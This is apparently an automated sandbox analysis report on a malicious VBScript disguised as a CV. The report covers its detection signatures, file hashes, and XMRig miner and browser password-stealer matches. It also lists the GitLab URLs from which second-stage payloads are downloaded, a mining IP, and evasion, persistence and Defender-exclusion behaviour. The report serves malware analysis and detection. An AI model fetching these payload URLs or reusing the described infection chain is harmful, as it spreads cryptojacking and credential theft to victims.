Windows Analysis Report
curriculum_vitae-copie.vbs

Overview

General Information

Sample Name: curriculum_vitae-copie.vbs
Analysis ID: 882715
MD5: f72b1d9e4780f7b1b63fc2e2e88f1593
SHA1: 95f3a182de433dac071eb353f1abd50b8643aabe
SHA256: 4a346ad97d3b8093e61c3a0ab67a1a6611fb5c399725eea10becbdd0f331ee13
Tags: vbs
Infos:

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

VBScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Sigma detected: Register Wscript In Run Key
Multi AV Scanner detection for dropped file
Sigma detected: Xmrig
Wscript called in batch mode (surpress errors)
Found strings related to Crypto-Mining
Wscript starts Powershell (via cmd or directly)
Query firmware table information (likely to detect VMs)
Potential malicious VBS script found (suspicious strings)
Sample is not signed and drops a device driver
Queries sensitive share information (via WMI, WIN32_SHARE, often done to detect sandboxes)
Deletes itself after installation
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Potential evasive VBS script found (sleep loop)
Potential malicious VBS script found (has network functionality)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Yara detected WebBrowserPassView password recovery tool
Queries sensitive share information (via WMI, Win32_Share, often done to detect virtual machines)
Machine Learning detection for dropped file
Drops PE files to the user root directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates driver files
Drops PE files to the user directory
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Enables security privileges
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Name Description Attribution Blogpost URLs Link
xmrig According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\Public\WindowsUpdate\mservice.exe Avira: detection malicious, Label: HEUR/AGEN.1311290
Multi AV Scanner detection for submitted file
Source: curriculum_vitae-copie.vbs Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\WindowsUpdate\mservice.exe ReversingLabs: Detection: 83%
Source: C:\Users\Public\WindowsUpdate\ps.exe ReversingLabs: Detection: 80%
Machine Learning detection for dropped file
Source: C:\Users\Public\WindowsUpdate\ps.exe Joe Sandbox ML: detected
Source: C:\Users\Public\WindowsUpdate\mservice.exe Joe Sandbox ML: detected

Bitcoin Miner
barindex
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7g.exe PID: 5428, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mservice.exe PID: 3476, type: MEMORYSTR
Source: Yara match File source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED
Found strings related to Crypto-Mining
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: cryptonight/0
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: -o, --url=URL URL of mining server
Source: unknown HTTPS traffic detected: 49.12.202.237:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: Binary string: .pdbo` source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, go.exe.11.dr
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr
Source: C:\Users\Public\7g.exe Code function: 11_2_003B716C __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 11_2_003B716C
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Adobe\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\Public\7g.exe Code function: 11_2_003B6553 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 11_2_003B6553

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 49.12.202.237 443 Jump to behavior
Source: C:\Windows\System32\wscript.exe Domain query: www.7-zip.org
Source: C:\Windows\System32\wscript.exe Domain query: gitlab.com
Source: C:\Windows\System32\wscript.exe Network Connect: 172.65.251.78 443 Jump to behavior
Potential malicious VBS script found (has network functionality)
Source: Initial file: .write L5caQRBcFL5.responseBody
Source: Initial file: .savetofile L5M2srg9CbnIL5, 2
Source: C:\Users\Public\7g.exe Dropped file: .write L5xL5.responseBody Jump to dropped file
Source: C:\Users\Public\7g.exe Dropped file: .savetofile L5sL5, 2 '//overwrite Jump to dropped file
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /a/7zr.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.7-zip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cv4345521/cv/-/raw/main/gmail.7z?inline=false HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gitlab.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 172.65.251.78 172.65.251.78
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: wscript.exe, 00000005.00000003.811414806.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858655277.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216311D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr String found in binary or memory: http://www.nirsoft.net/
Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://content-cloudbilling.googleapis.com
Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://content-cloudresourcemanager.googleapis.com
Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://content-compute.googleapis.com
Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://content.googleapis.com
Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://customers.gitlab.com
Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gitlab.com
Source: wscript.exe, 00000005.00000003.811414806.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858655277.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216311D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gitlab.com/
Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gitlab.com/-/sandbox/
Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gitlab.com/-/speedscope/index.html
Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gitlab.com/admin/
Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gitlab.com/assets/
Source: wscript.exe, 00000005.00000003.475087374.0000022162DC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163163000.00000004.00000020.00020000.00000000.sdmp, curriculum_vitae-copie.vbs String found in binary or memory: https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=false
Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=falseA
Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=falsem
Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=falsex
Source: wscript.exe, 00000019.00000002.899281249.000001FFE25D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899123544.000001FFE0938000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899241012.000001FFE0BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898695255.000001FFE094D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898409186.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898525051.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899199737.000001FFE094E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898567720.000001FFE0943000.00000004.00000020.00020000.00000000.sdmp, sarmat.vbs.11.dr String found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false
Source: wscript.exe, 00000015.00000002.992417001.0000016591D38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898409186.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898525051.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898567720.000001FFE0943000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=falseMsg
Source: wscript.exe, 00000017.00000002.881382988.000001E320C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899241012.000001FFE0BB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=falsee
Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gitlab.com/cwIf
Source: wscript.exe, 00000005.00000003.858655277.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216310C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://new-sentry.gitlab.net
Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sentry.gitlab.net
Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sentry.gitlab.net/api/105/security/?sentry_key=a42ea3adc19140d9a6424906e12fba86;
Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://snowplow.tgitlab.c%
Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://snowplow.tgitlab.c%%.
Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://snowplow.trx.gitlab.net
Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sourcegraph.com
Source: wscript.exe, 00000005.00000003.858655277.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216310C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.7-zip.org/O
Source: wscript.exe, 00000005.00000003.475087374.0000022162DC5000.00000004.00000020.00020000.00000000.sdmp, curriculum_vitae-copie.vbs String found in binary or memory: https://www.7-zip.org/a/7zr.exe
Source: wscript.exe, 00000005.00000003.858386999.0000022162F60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860549226.0000022162F61000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.856009779.0000022162F60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.7-zip.org/a/7zr.exel
Source: wscript.exe, 00000005.00000003.858655277.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216310C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.7-zip.org/w
Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/ns.html
Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.recaptcha.net/
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.dr String found in binary or memory: https://xmrig.com/docs/algorithms
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.dr String found in binary or memory: https://xmrig.com/wizard
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.dr String found in binary or memory: https://xmrig.com/wizard%s
Source: unknown DNS traffic detected: queries for: www.7-zip.org
Source: global traffic HTTP traffic detected: GET /a/7zr.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.7-zip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cv4345521/cv/-/raw/main/gmail.7z?inline=false HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gitlab.comConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: unknown HTTPS traffic detected: 49.12.202.237:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49713 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
